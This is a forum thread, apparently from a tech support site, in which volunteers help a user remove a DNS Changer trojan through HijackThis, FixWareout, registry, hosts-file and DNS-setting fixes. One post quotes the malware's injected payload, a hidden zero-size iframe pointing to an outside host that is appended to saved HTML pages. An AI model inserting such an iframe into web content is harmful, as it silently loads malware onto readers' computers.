Trojan DNS Changer - 85.255.113.90

[vinny]

Dear Sirs,

I was wondering if someone could please help me with a persistent Trojan infection. I use Spyware Doctor and everytime I do a scan it detects and "cleans" 2 Trojan DNS Changer viruses -one that points to 85.255.113.90 and another that points to 85.255.112.5. However after rebooting the viruses are still there and any mails that I send via Outlook are infected.

Tech Support at Spyware Doctor are unable to help, which is why I have turned here in desperation. I am not good with computers and this is the first time I have posted to any kind of forum, so please forgive me if I've not acted according to protocol.

From what I can tell, the normal practise is to send a HJT log file, so here goes:

 

[howard_hopkinso]

Hello and welcome to Techspot.

Very Important: Before deciding whether you should clean or reformat your system, go and read this thread HERE and decide what it is you want to do.

If after reading the above, you wish to clean your system, do the following.

Go and read the Viruses/Spyware/Malware, preliminary removal instructions. Follow all the instructions exactly.

Post fresh HJT, AVG Antispyware and Combofix logs as attachments into this thread, only after doing the above.

Also, let me know the results of the AVG Antirootkit scan.

Regards Howard :wave: :wave:

This thread is for the use of vinny only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.

 

[vinny]

Dear Howard,

First of all, thank you for helping me. I decided to clean rather than reinstall and followed all 15 steps - took me the better part of a day and a humbling experience. I think I'm still infected as my latest AVG scan picked out the a couple of viruses that it said are now healed but perhaps you could confirm.

The viruses were aaw2007.exe and a restore file called A0084198.exe

The AVGAS, HJT and Combofix logs are attached. The Antirootkit Scan was clean.

Thanks again
Vinny

seems the Combofix file didn't get attached, so here it is.

 

[howard_hopkinso]

Your system has been hijacked.

Please do the following.

Delete all files in AVG Antispyware quarantine.

Please download FixWareout from one of these sites:
http://downloads.subratam.org/Fixwareout.exe
http://www.bleepingcomputer.com/files/lonny/Fixwareout.exe

Save it to your desktop and run it. Click Next, then Install, make sure "Run fixit" is checked and click Finish.
The fix will begin; follow the prompts. You will be asked to reboot your computer; please do so. Your system may take longer than usual to load; this is normal.

Thereafter, please post fresh HJT, Combofix and C:\fixwareout\report.txt logs as well as a fresh AVG Antispyware log if anything is found.

Regards Howard

This thread is for the use of vinny only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.

 

[vinny]

Howard, thanks for the speedy reply. Do you get any sleep?

Attached are fresh logs from HJT, Combofix, FixWareout and AVG-AS. Looks like there's still something there - HJT logs still show 85.255.113.90 and 85.255.112.5 and AVG-AS found and cleanded a Trojan Downloader.

Please advise.

Ta everso,
Vinny

 

[howard_hopkinso]

You might want to copy and paste these instructions into a notepad file. Then you can have the file open in safe mode, so you can follow the instructions easier.

Boot into safe mode, under your normal user name(NOT THE ADMINISTRATOR ACCOUNT). See how HERE.

In Windows Explorer, turn on "Show all files and folders, including hidden and system". See how HERE.

Delete all files in AVG Antispyware quarantine.

Open your task manager, by holding down the ctrl and alt keys and pressing the delete key.

Click on the processes tab and end process for(if there).

Q330995.exe

Close task manager.

Run HJT with no other programmes open(except notepad). Click the scan button. Have HJT fix the following, by placing a tick in the little box next to(if there).

O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\PROGRA~1\SPYWAR~1\tools\iesdsg.dll (file missing)

O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - (no file)

O16 - DPF: {003FACAF-40CB-4358-96D2-B0D8CEF4DBF5} (SKeyHelper Class) - https://bet.hongkongjockeyclub.com/ib/skey/en/cab/EWinSKey.CAB

O16 - DPF: {11311111-1111-1111-1111-111111111157} - file://C:\Recycled\Q330995.exe

O16 - DPF: {3EA4FA88-E0BE-419A-A732-9B79B87A6ED0} (CTVUAxCtrl Object) - http://dl.tvunetworks.com/TVUAx.cab

O17 - HKLM\System\CCS\Services\Tcpip\..\{C578FB95-EF20-41EC-A069-A6032374751B}: NameServer = 85.255.113.90 85.255.112.5

O24 - Desktop Component AutorunsDisabled: (no name) - (no file)

Click on the fix checked button.

Close HJT.

Empty your recycle bin.

Reboot into normal mode and rehide your protected OS files.

Turn off system restore.(XP/ME only) See how HERE.

Now, turn system restore back on. This will have deleted all your old restore points and any nasties that are in them. It will also have created a new, clean restore point.

Post a fresh HJT log.

Regards Howard

This thread is for the use of vinny only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.

 

[vinny]

Morning Howard,

Did everything you asked.

Q330995 was not running so didn't need to delete it within Task Manager

System Restore was tricky - the tutorial said it can only be turned on/off when logged in as Administrator, and because I use XP Home, I had to go into Safe Mode to turn it off. However it didn't let me turn it back on in Safe Mode so I had to reboot into Normal Mode and turn it back on. Hope this didn't mess up the process.

Fresh HJT log attached. It looks good to me, but I'm no expert (not by a long shot).

Thanks again for all your help.

Vinny

 

[howard_hopkinso]

Your HJT log is clean.

If you have any further virus/spyware problems, please post in this thread.

Regards Howard

This thread is for the use of vinny only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.

 

[vinny]

Hi Howard,

I think I may have celebrated too soon. Someone receiving an email from me today reported that it was infected. I took another HJT scan and can still see those 2 pesky DNS - 85.255.113.90 and 85.255.112.5

I've attached the HJT scan and would be grateful if you could take a look. I'm beginning to worry that there no way of getting rid of this for good.

Vinny

 

[howard_hopkinso]

Please download FixWareout from one of these sites:
http://downloads.subratam.org/Fixwareout.exe
http://www.bleepingcomputer.com/files/lonny/Fixwareout.exe

Save it to your desktop and run it. Click Next, then Install, make sure "Run fixit" is checked and click Finish.
The fix will begin; follow the prompts. You will be asked to reboot your computer; please do so. Your system may take longer than usual to load; this is normal.

Run HJT with no other programmes open(except notepad). Click the scan button. Have HJT fix the following, by placing a tick in the little box next to(if there).

O17 - HKLM\System\CCS\Services\Tcpip\..\{C578FB95-EF20-41EC-A069-A6032374751B}: NameServer = 85.255.113.90 85.255.112.5

Click on the fix checked button.

Close HJT and reboot your system.

Post a fresh HJT log as well as the C:\fixwareout\report.txt

Regards Howard

This thread is for the use of vinny only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.

 

[vinny]

Hi Howard,

Did what you asked. The HJT and FixWareout logs are attached. Looks clean to me now. Do you know why the Trojans reappeared?

Vinny

 

[howard_hopkinso]

Your HJT log is now clean.

If you have any further virus/spyware problems, please post in this thread.

Regards Howard

This thread is for the use of vinny only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.

 

[spiritedwolf]

and any mails that I send via Outlook are infected...

It sounds like you have a macro virus, I'm not sure though. If they are, they may have rewritten Outlook's new mail template file (which gets loaded for every new mail) , so that every new mail you create has the virus embedded. This is just a guess though...

If they are a macro viruses, my only guess as to how to remove it is to reinstall Outlook.

 

[vinny]

it's happened again:

- my emails are infected
- so I do a HJT scan and can see the 85.255.113.90 and 85.255.112.5
- so I clean using FixWareout and it seems to detect and clean the malware
- I do a new HJT scan and the bad stuff is gone

But after a little while, there they are again.

Does someone know what is going on? Do I really need to reinstall Outlook?

Much obliged to all of you for your help.

Vinny

 

[vinny]

I did some searching on other tech boards and think I may have found the source of the problem, though I still don't know how to fix it. Here's an edited version of what I found which describes exactly the problem I'm experiencing:

" all saved html pages *.htm *.html have been secretly appended with
an html script to summon a virus from the internet. Merely viewing
the saved file executes the script and more scripts download to
propagate this insidious malignancy.

The problem of course is that although the a scan detects the Trojan , you can never be rid of it as copies of it are continually dispersed throughout
the harddisk!

The *.htm files are secretly scripted with the following html code , placed after the </HTML> end of the file's own code , like this , it then executes when viewed _

</HTML>
<iframe src=http://www.xiangxue.org/222/index.htm width=0 height=0>
</iframe>

This can only be seen by opening the file in notepad , and it may be
repeated many times. The tipoff that this is malicious is that the width
and height specified is ' 0 ' -zero dimension , so it will not otherwise display.

Could someone please tell me how to rid myself of this Trojan? Do I need to open every .htm file in Notepad and delete the offending scripts? All 361 of them! I hope there is an easier way.

Thanks,
Vinny

 

[howard_hopkinso]

I think it`s probably time to consider a reformat. That should definitely get rid of your problem.

Regards Howard

This thread is for the use of vinny only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.

 

[DelJo63]

find the host file on your system
\windows\system32\drivers\etc

add this line to that file
127.0.0.1 www.xiangxue.org
be sure to have 2 or three spaces after the 127.0.0.1

your system will NEVER access that domain again!

 

[TimeParadoX]

Also you could consider not using Outlook express, alot of problems are with that program that could get your computer infected even more, you should also consider installing FireFox if you haven't already

 

[ameer]

Answer!!!

I had this problem too, and i found my own way that worked. not sure if it'll work for all, (this is for router users, not sure about others) but here it is:
(u need malwarebytes antimalware)

disconnect from the internet,
run "regedit" and delete bad registry keys, (malwarebytes will tell u in the log after scan)
run Malwarebytes to clear any infections,
remove the amended dns settings, (network properties) (IPv6 or what ever, click advanced)
reset the router, (if u have one)
run another scan,
restart your computer in safe mode, (just to be safe, and not connect to router)
run Malwarebytes to scan,
restart your computer normally,
run Malwarebytes quick scan, (being "safe" again)
connect to the internet,
perform final scan to ensure it is completely gone. (hope it's gone!!!)

 

[trailingedge]

I recently had the same issue with a computer that i was working on the other night and it was a very simple fix for me not sure if it will work for you but give it a shot.

Alot of new viruses are changing the DNS in the IP properties

Open up network connections in control panel and right click on Local Area Connection. Go to properties, Select "Internet Protocol (TCP/IP)", hit properties and make sure that the obtain DNS server address is set to automatically obtain DNS server address.